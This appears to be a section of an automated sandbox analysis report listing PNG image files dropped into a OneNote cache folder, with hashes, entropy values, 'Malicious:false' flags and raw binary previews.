                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

